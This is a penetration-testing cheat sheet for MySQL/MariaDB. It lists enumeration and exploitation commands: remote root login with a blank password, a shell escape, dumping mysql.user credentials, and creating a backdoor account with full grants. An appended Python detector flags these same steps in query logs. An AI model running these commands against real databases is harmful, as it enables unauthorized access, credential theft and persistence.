Port 3306 - MySQL/MariaDB
MySQL is commonly found running on either Windows or Linux servers. The original MySQL solution was bought by Oracle; the previous open-source variant was forked and is referred to as MariaDB.
Default credentials are often set to root:, with some instances, as per the example, not requiring a password.
MySQL/MariaDB Scanning and Enumeration
| Tool | Script/Module | Auth | MITRE ATT&CK Tactic | Command |
| --- | --- | --- | --- | --- |
| MSF | mysql_enum | Y | Reconnaissance | |
| Nmap | mysql-info | N | Reconnaissance | sudo nmap -A -p 3306 -n 10.10.10.10 |
MySQL/MariaDB Exploitation
MySQL Database Interaction
The MySQL command line tool can be used to interface with a remote MySQL/MariaDB instance.
# Accessing a Remote Server
mysql -h 10.10.10.10 -u root
mysql -h 10.10.10.10 -u root -e 'show databases;'
# Database Interaction
show databases; # Show all available databases
use %DATABASE%; # Switch to the selected database
show tables; # Show tables in the selected database
describe %TABLE%; # Show the column details of the selected table
select * from %TABLE%; # Show all data stored in the selected table
# Exploitation
\! sh # Drop into a shell
mysql -h 10.10.10.10 -u root --password=%PASSWORD% -e "SELECT * FROM mysql.user;" # Credential Dumping
create user test identified by 'test'; # Create a new user and assign admin privileges
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
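A detection-side view of the commands above, as an added example that is not part of the original page: this Python script scans general query log lines for a remote root login, a read of mysql.user, account creation, and a grant carrying WITH GRANT OPTION. The sample lines are constructed, and their layout (timestamp, connection id, command, argument) is an assumption modelled on the MySQL general query log, which must be enabled on the server for these events to be recorded.

```python
import re

# General query log line (assumed layout): timestamp, connection id, command, argument.
LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<id>\d+)\s+(?P<cmd>Connect|Query|Quit)\s*(?P<arg>.*)$")
# Statements from this page worth an alert when they appear in the log.
RULES = [
    ("credential-table-read", re.compile(r"\bfrom\s+mysql\.user\b", re.I)),
    ("account-created", re.compile(r"^\s*create\s+user\b", re.I)),
    ("grant-with-grant-option", re.compile(r"^\s*grant\b.*\bwith\s+grant\s+option\b", re.I | re.S)),
]
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def detect(lines):
    """Return (timestamp, connection id, account, rule) for each suspicious event."""
    sessions, alerts = {}, []
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue  # continuation lines of multi-line statements are skipped
        cid, cmd, arg = m["id"], m["cmd"], m["arg"]
        if cmd == "Connect":
            account = arg.split(" on ")[0].strip()  # "user@host on db using TCP/IP"
            sessions[cid] = account
            user, _, host = account.partition("@")
            if user == "root" and host not in LOCAL_HOSTS:
                alerts.append((m["ts"], cid, account, "remote-root-login"))
        elif cmd == "Query":
            for name, rx in RULES:
                if rx.search(arg):
                    alerts.append((m["ts"], cid, sessions.get(cid, "?"), name))
        elif cmd == "Quit":
            sessions.pop(cid, None)
    return alerts

# Constructed sample input (not captured from a real server).
SAMPLE_LOG = """\
2024-05-01T09:14:02.118233Z\t   41 Connect\troot@10.10.10.20 on  using TCP/IP
2024-05-01T09:14:02.120871Z\t   41 Query\tshow databases
2024-05-01T09:14:09.551902Z\t   41 Query\tSELECT * FROM mysql.user
2024-05-01T09:14:30.004417Z\t   41 Query\tcreate user test identified by <secret>
2024-05-01T09:14:41.730066Z\t   41 Query\tgrant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by <secret> WITH GRANT OPTION
2024-05-01T09:15:00.000100Z\t   42 Connect\tapp@localhost on shop using Socket
2024-05-01T09:15:00.000900Z\t   42 Query\tSELECT id FROM orders WHERE id = 7
2024-05-01T09:15:03.412000Z\t   41 Quit\t
""".splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert, sep="  ")
```

The log records a connection but not whether a password was supplied, so an empty root password still has to be found by auditing the accounts themselves.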